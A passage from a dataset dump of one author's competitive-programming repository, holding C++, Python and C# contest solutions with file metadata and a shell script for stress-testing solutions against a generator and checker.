"UTF-8", "text": "def convert(x):\n return int(x.replace('one', '1').replace('zero', '0'), 2)\n\n\na = convert(input())\nb = convert(input())\n\nif a == b:\n print('=')\nelif a < b:\n print('<')\nelse:\n print('>')\n\n" }, { "alpha_fraction": 0.4980824589729309, "alphanum_fraction": 0.5146212577819824, "avg_line_length": 25.743589401245117, "blob_id": "575a60ec3078879d7f4a6eda97f657a6f9ee462b", "content_id": "bbe4555727b7eb473e6f19ec73b5744b625b6fe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4172, "license_type": "no_license", "max_line_length": 174, "num_lines": 156, "path": "/2022/yandexBackend/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntypedef bitset<1024> bs;\n\nstruct commit {\n ll t;\n bs d;\n};\n\nstruct service {\n int n;\n ll ct;\n bs d;\n\n vector<pair<int, ll>> s;\n\n void add(const vector<commit>& commits)\n {\n int m = commits.size();\n ll last = 0;\n\n int i = 0;\n while (i < m)\n {\n int j = i;\n int c = 0;\n while (j < m)\n {\n bool ok = (commits[j].d & d).any();\n if (ok)\n if (++c == n)\n break;\n ++j;\n }\n if (c == n)\n {\n ll start = max(last, commits[j].t);\n while (j < m && commits[j].t <= start)\n ++j;\n --j;\n if (commits[j].t <= start)\n {\n last = start + ct;\n s.emplace_back(j, last);\n }\n }\n i = j + 1;\n }\n }\n\n ll get(int commit)\n {\n auto it = lower_bound(s.begin(), s.end(), pair(commit, 0ll));\n if (it == s.end())\n return -1;\n else\n return it->second;\n }\n\n service() {}\n};\n\nistream& operator>>(istream& is, service& s)\n{\n int n, x;\n is >> s.n >> s.ct >> n;\n fori(n)\n is >> x,\n s.d.set(x);\n return is;\n}\n\nistream& operator>>(istream& is, commit& c)\n{\n int n, x;\n is >> c.t >> n;\n fori(n)\n is >> x,\n c.d.set(x);\n return is;\n}\n\nvoid run()\n{\n ints(d, s);\n vector<service> services(s);\n readln(services);\n ints(c);\n vector<commit> commits(c);\n readln(commits);\n for (auto& service: services)\n service.add(commits);\n ints(q);\n fori(q)\n {\n ints(commit, service); --commit; --service;\n writeln(services[service].get(commit));\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5649999976158142, "alphanum_fraction": 0.5849999785423279, "avg_line_length": 19, "blob_id": "8deafc4a632d8e5fa8f5ee949d3abce0dd3f65c3", "content_id": "b0b669114ba69869c788d5e6989a61612dea9434", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 400, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/2017/newYear/E.cs", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "using System;\nusing System.IO;\nusing System.Linq;\nusing System.Numerics;\nusing System.Collections.Generic;\n\nclass Program\n{\n\tstatic void Main()\n\t{\n int[] a = Console.ReadLine().Split().Select(x => int.Parse(x)).ToArray();\n int x1 = a[0];\n int y1 = a[1];\n int x2 = a[2];\n int y2 = a[3];\n int w = int.Parse(Console.ReadLine());\n\n\t\tConsole.WriteLine(ans);\n\t}\n}\n" }, { "alpha_fraction": 0.5013589262962341, "alphanum_fraction": 0.5232613682746887, "avg_line_length": 28.0930233001709, "blob_id": "8bb9a9f49b0f13dfe84562c465169e136e0da313", "content_id": "0c2d83a58f8bb0149b2df50a40badc0581792fb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6255, "license_type": "no_license", "max_line_length": 163, "num_lines": 215, "path": "/CodeForce/1033/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nmap<vector<int>, int> cache;\n\nint query(vector<int>& a)\n{\n sort(whole(a));\n if (a.size() <= 1)\n return 0;\n if (cache.find(a) != cache.end())\n return cache[a];\n writeln('?', a.size());\n writeln(a);\n cout.flush();\n ints(x);\n if (x == -1)\n exit(1);\n cache[a] = x;\n return x;\n}\n\nint dist(vector<int>& a, vector<int>& b)\n{\n //writeln(\"Finding count of edges between\", a, \"and\", b);\n vector<int> c(b);\n for (int& x: a)\n c.pb(x);\n return query(c) - query(a) - query(b);\n}\n\npair<int, int> getEdge(vector<int>& a, vector<int>& b)\n{\n //writeln(\"Finding edge between sets\", a, \"and\", b);\n int n = a.size();\n int m = b.size();\n if (n > 1)\n {\n vector<int> x1, x2;\n fori(n)\n (i % 2 == 0 ? x1 : x2).pb(a[i]);\n //writeln(\"Dividing a into\", x1, \"and\", x2);\n return getEdge(dist(x1, b) ? x1 : x2, b);\n }\n if (m > 1)\n {\n vector<int> y1, y2;\n fori(m)\n (i % 2 == 0 ? y1 : y2).pb(b[i]);\n //writeln(\"Dividing b into\", y1, \"and\", y2);\n return getEdge(a, dist(y1, a) ? y1 : y2);\n }\n //writeln(\"Found edge\", a[0], \"->\", b[0]);\n return {a[0], b[0]};\n}\n\npair<int, int> getEdge2(vector<int>& a)\n{\n //writeln(\"Finding edge in\", a);\n int n = a.size();\n if (n > 2)\n {\n vector<int> x1, x2;\n fori(n)\n (i % 2 == 0 ? x1 : x2).pb(a[i]);\n //writeln(\"Dividing a into\", x1, \"and\", x2);\n int x1s = query(x1);\n int x2s = query(x2);\n if (x1s + x2s == 0)\n return getEdge(x1, x2);\n return getEdge2(x1s ? x1 : x2);\n }\n //writeln(\"Found edge\", a[0], \"->\", a[1]);\n return {a[0], a[1]};\n}\n\nvoid run()\n{\n ints(n);\n if (n == 1)\n {\n writeln('Y', 1);\n writeln(1);\n }\n vector<int> left(1, 1);\n vector<int> right;\n for (int i = 2; i <= n; ++i)\n right.pb(i);\n\n vector<vector<int>> edges(n + 1);\n while (right.size())\n {\n auto [f, t] = getEdge(left, right);\n edges[f].pb(t);\n edges[t].pb(f);\n left.pb(t);\n right.erase(lower_bound(whole(right), t));\n }\n left.clear();\n right.clear();\n function<void(int, int, int)> dfs = [&](int u, int p, int depth) {\n (depth % 2 == 0 ? left : right).pb(u);\n for (int& x : edges[u])\n if (x != p)\n dfs(x, u, depth + 1);\n };\n dfs(1, -1, 0);\n int ls = query(left);\n int rs = query(right);\n if (ls + rs == 0)\n {\n writeln('Y', left.size());\n writeln(left);\n return;\n }\n auto [f, t] = getEdge2(ls ? left : right);\n edges[f].pb(t);\n edges[t].pb(f);\n vector<int> used(n + 1, 0);\n vector<int> ans;\n int found = 0;\n function<void(int, int, int)> dfs2 = [&](int u, int p, int depth) {\n if (used[u])\n found = used[u];\n if (found)\n return;\n used[u] = depth;\n ans.pb(u);\n for (int& x : edges[u])\n if (x != p)\n {\n dfs2(x, u, depth + 1);\n if (found) return;\n }\n ans.pop_back();\n };\n dfs2(1, -1, 0);\n fori(found) ans.erase(ans.begin());\n writeln('N', ans.size());\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&& a){cout<<\" \"<<a;}\nttti void priws(T&& a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4484441876411438, "alphanum_fraction": 0.47589993476867676, "avg_line_length": 25.868852615356445, "blob_id": "ac0e75091d6060b0b6ee87678ad806a1a4d476f9", "content_id": "26a7f2dac3a82053cc0f4738a6dbc3d20ac6d8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 123, "num_lines": 61, "path": "/atcoder/abc162/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <map>\n#include <numeric>\n#include <iomanip>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n int n;\n string s;\n cin >> n >> s;\n vector<vector<int>> has(n + 1, {0, 0, 0});\n map<char, int> m = {{'R', 0}, {'G', 1}, {'B', 2}};\n ROF(i, n - 1, 0)\n has[i] = has[i + 1],\n has[i][m[s[i]]]++;\n ll ans = 0;\n fori(n)\n FOR(j, i + 1, n)\n if (s[i] != s[j])\n {\n ans += has[j][0] + has[j][1] + has[j][2] - has[j][m[s[i]]] - has[j][m[s[j]]];\n if (int k = j + (j - i); k < n && s[k] != s[i] && s[k] != s[j])\n ans--;\n }\n\n cout << ans << \"\\n\";\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.5274056196212769, "alphanum_fraction": 0.5456759929656982, "avg_line_length": 21.189189910888672, "blob_id": "abd30901c07b50b05a6de44e0bf36d89c8667616", "content_id": "2602eadc302b8a99298c80feb8c2c28b31723495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 821, "license_type": "no_license", "max_line_length": 115, "num_lines": 37, "path": "/scripts/tester.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "shopt -s nullglob\ndir='.'\n\nif [[ ! -z \"$1\" ]]; then\n dir=$1\nfi\ntask=\"$dir/A\"\ncorrect=$2\ngenerator=$3\nchecker=$4\nif [[ -z \"$correct\" ]]; then\n correct=$task\nfi\nif [[ -z \"$generator\" ]]; then\n generator=\"$dir/generator\"\nfi\nif [[ -z \"$checker\" ]]; then\n checker=\"$dir/checker\"\nfi\n\nfor i in $dir/*.cpp; do\n if [[ $i =~ \"*\" ]]; then\n break\n fi\n echo $i\n clang++ -std=c++17 -DONLINE_JUDGE -include /home/igorjan/206round/bits.h -O2 $i -o $i.exe\ndone\n\nstop=\"false\"\nwhile [[ \"false\" = \"$stop\" ]]; do\n $generator 2>/dev/null > \"$task.in\"\n $correct 2>/dev/null < \"$task.in\" > \"$task.a\"\n for i in $dir/*.cpp.exe; do\n $i 2>/dev/null < $task.in > $i.output\n $checker $task.in $i.output $task.a 2>/dev/null || (cp $task.in $i.failed && rm -rf $i && echo \"failed $i\")\n done\ndone\n" }, { "alpha_fraction": 0.517234206199646, "alphanum_fraction": 0.5311461687088013, "avg_line_length": 29.871795654296875, "blob_id": "6984956543d8fc5dc584cfed90cdd048d5e2e74d", "content_id": "560e7d27f1da793de7535132d303cdba3b911a68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4816, "license_type": "no_license", "max_line_length": 167, "num_lines": 156, "path": "/CodeForce/0908/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (#define -> typedef, readln(vector) patched, version from 27 March 2017)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\nvoid run()\n{\n ll ans = 0;\n map<char, int> prev, mx;\n prev['G'] = prev['R'] = prev['B'] = -1;\n\n ints(n);\n vi x(n);\n\tvector<char> color(n);\n\tfori(n)\n\t\treadln(x[i], color[i]);\n\n auto dist = [&](int i, int j) {\n if (j == -1 || i == -1)\n return 0;\n return abs(x[i] - x[j]);\n };\n\n int i = 0, j = n - 1;\n char R = 'R', B = 'B', G = 'G';\n for (; i < n && color[i] != G; ++i)\n ans += dist(prev[color[i]], i),\n\t\tprev[color[i]] = i;\n if (i < n) ans += dist(prev[R], i) + dist(prev[B], i);\n\n prev[G] = prev[R] = prev[B] = -1;\n\tfor (; j >= i && color[j] != G; --j)\n\t\tans += dist(j, prev[color[j]]),\n\t\tprev[color[j]] = j;\n if (j >= 0) ans += dist(prev[R], j) + dist(prev[B], j);\n\n prev[G] = prev[R] = prev[B] = i;\n for (int q = i; q <= j; ++q)\n {\n if (color[q] == G)\n {\n ll d = dist(q, prev[G]);\n mx[R] = max(mx[R], dist(q, prev[R]));\n mx[B] = max(mx[B], dist(q, prev[B]));\n ans += min(2ll * d, 3ll * d - mx[B] - mx[R]);\n\n mx[R] = mx[B] = 0;\n prev[R] = prev[B] = q;\n }\n else\n mx[color[q]] = max(mx[color[q]], dist(q, prev[color[q]]));\n prev[color[q]] = q;\n }\n\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,valarray<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5423728823661804, "alphanum_fraction": 0.5593220591545105, "avg_line_length": 28.5, "blob_id": "e8500f7b8431411699de3ac34bc633809891f1ee", "content_id": "25e945f042c6d29a1209624baa2c67e6e122939d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/CodeForce/0805/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "l, r = map(int, input().split())\nprint(l if l == r else 2)\n" }, { "alpha_fraction": 0.46503496170043945, "alphanum_fraction": 0.47785547375679016, "avg_line_length": 18.953489303588867, "blob_id": "acd07b5ce1affcfa1ad4da6968375810c04420b6", "content_id": "591553c21f4e290e145b02e7fa5cd92290f62a7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 71, "num_lines": 43, "path": "/2021/yandexBackendQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def read():\n return list(map(int, input().split()))\n\ndef get(a):\n return '.'.join(map(str, a))\n\n[n, m] = read()\n[w] = read()\nwhites = [read() for i in range(w)]\n[b] = read()\nblacks = [read() for i in range(b)]\nwho = input()\nif who == 'black':\n whites, blacks = blacks, whites\n w, b = b, w\n\nbb = set(map(get, blacks))\nww = set(map(get, whites))\ncan = False\n\ndef exists(x, y):\n return x >= 1 and y >= 1 and x <= n and y <= m\n\ndx = [1, 1, -1, -1]\ndy = [-1, 1, 1, -1]\nfor i in range(w):\n x, y = whites[i]\n for q in range(4):\n u = x + dx[q]\n v = y + dy[q]\n uu = u + dx[q]\n vv = v + dy[q]\n\n if exists(u, v) and exists(uu, vv):\n uuvv = get([uu, vv])\n if get([u, v]) in bb and not uuvv in bb and not uuvv in ww:\n can = True\n\n\nif can:\n print('Yes')\nelse:\n print('No')\n" }, { "alpha_fraction": 0.42898550629615784, "alphanum_fraction": 0.4688405692577362, "avg_line_length": 30.724138259887695, "blob_id": "bc78ce21dc1059e5ca46142eb9a58b9f44db942c", "content_id": "b9f08b4f1700d0d8a5003a98f1a2a49fb5a0a4f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2760, "license_type": "no_license", "max_line_length": 928, "num_lines": 87, "path": "/2013/2013GCJ1stRoundB/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <string>\n#define enter printf(\"\\n\");\n#define ull unsigned long long\n#define ll long long\n#define sort(a) sort(a.begin(), a.end())\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nint n, x, y;\nint co[6][7] = {{1, 2, 0, 0, 0, 0, 0}, {1, 3, 4, 0, 0, 0, 0}, {1, 4, 7, 8, 0, 0, 0}, {1, 5, 11, 15, 16, 0, 0}, {1, 6, 16, 26, 31, 32, 0}, {1, 7, 22, 42, 57, 63, 64}};\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\ndouble test()\n{\n readln(n, x, y);\n x = abs(x);\n int i = 0;\n while (n > a[i])\n i++;\n int count = a[i] - n;\n if (count == 0)\n return (int) (x + y <= 2 * i);\n if (x + y < 2 * i)\n return 1;\n if (x + y > 2 * i)\n return 0;\n if (y == 2 * i)\n return 0;\n count = n - a[i - 1];\n if (count - 2 * i > y)\n return 1;\n if (count < y)\n return 0;\n bool f = false;\n if (count > 2 * i)\n {\n count -= 2 * i;\n y = 2 * i - y;\n f = true;\n }\n //writeln(n, x, y, count);\n double h = co[count - 1][y];\n for (int j = 0; j < count; j++, h /= 2);\n return !f ? 1.0 - h : h;\n}\n\nint main()\n{\n freopen(\"input1.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n a.resize(1);\n a[0] = 1;\n for (int i = 1; a[i - 1] < 1000000;i++)\n a.push_back((2 * i + 1) * (i + 1));\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%.8f\\n\", test());\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.44935065507888794, "alphanum_fraction": 0.4649350643157959, "avg_line_length": 19.263158798217773, "blob_id": "b14631598a9eeaa1ff3ee1fc3c81e2bf80634f49", "content_id": "374216f6f133d92a67c61f85b41333b3c5a5d849", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 385, "license_type": "no_license", "max_line_length": 50, "num_lines": 19, "path": "/TopCoder/2017-TCO-Algorithm/150/RangeEncoding.cc", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\nclass RangeEncoding \n{\npublic:\n int minRanges(vector <int> arr) \n {\n int ans = 1;\n for (int i = 1; i < arr.size(); ++i)\n if (arr[i] != arr[i - 1] + 1)\n ans++;\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.5096279978752136, "alphanum_fraction": 0.6542669534683228, "avg_line_length": 35.560001373291016, "blob_id": "539b6b8e73e8c74c39f09b9c15a8455c043ea9f0", "content_id": "35cf9ccb0056a3365237f38c245419c98130b5c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4570, "license_type": "no_license", "max_line_length": 66, "num_lines": 125, "path": "/CodeForce/1769/D3.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "k = int(input())\nif k == 26:\n print('''TC QC KC 6D 7D 8D 9D KD AD 9S KS AS 6H 9H JH QH KH AH\n6C 7C 8C 9C JC AC TD JD QD 6S 7S 8S TS JS QS 7H 8H TH\n\n6C 7C 8C TC JC KC 7D 9D QD AD 7S 8S TS JS QS 6H JH QH\n9C QC AC 6D 8D TD JD KD 6S 9S KS AS 7H 8H 9H TH KH AH\n\n9C TC JC KC 6D 9D JD 7S 8S TS JS QS KS 6H 7H 8H TH KH\n6C 7C 8C QC AC 7D 8D TD QD KD AD 6S 9S AS 9H JH QH AH\n\n8C 9C JC QC AC TD JD KD AD 7S 9S KS AS 8H 9H JH KH AH\n6C 7C TC KC 6D 7D 8D 9D QD 6S 8S TS JS QS 6H 7H TH QH\n\n8C TC JC KC AC 6D 9D TD JD KD 6S 9S AS 6H 7H TH KH AH\n6C 7C 9C QC 7D 8D QD AD 7S 8S TS JS QS KS 8H 9H JH QH\n\n7C 9C TC QC 6D 8D TD JD QD KD 8S TS QS KS 9H TH JH QH\n6C 8C JC KC AC 7D 9D AD 6S 7S 9S JS AS 6H 7H 8H KH AH\n\n8C 9C JC 7D 8D TD JD KD AD 6S 8S 9S JS AS 6H 7H JH QH\n6C 7C TC QC KC AC 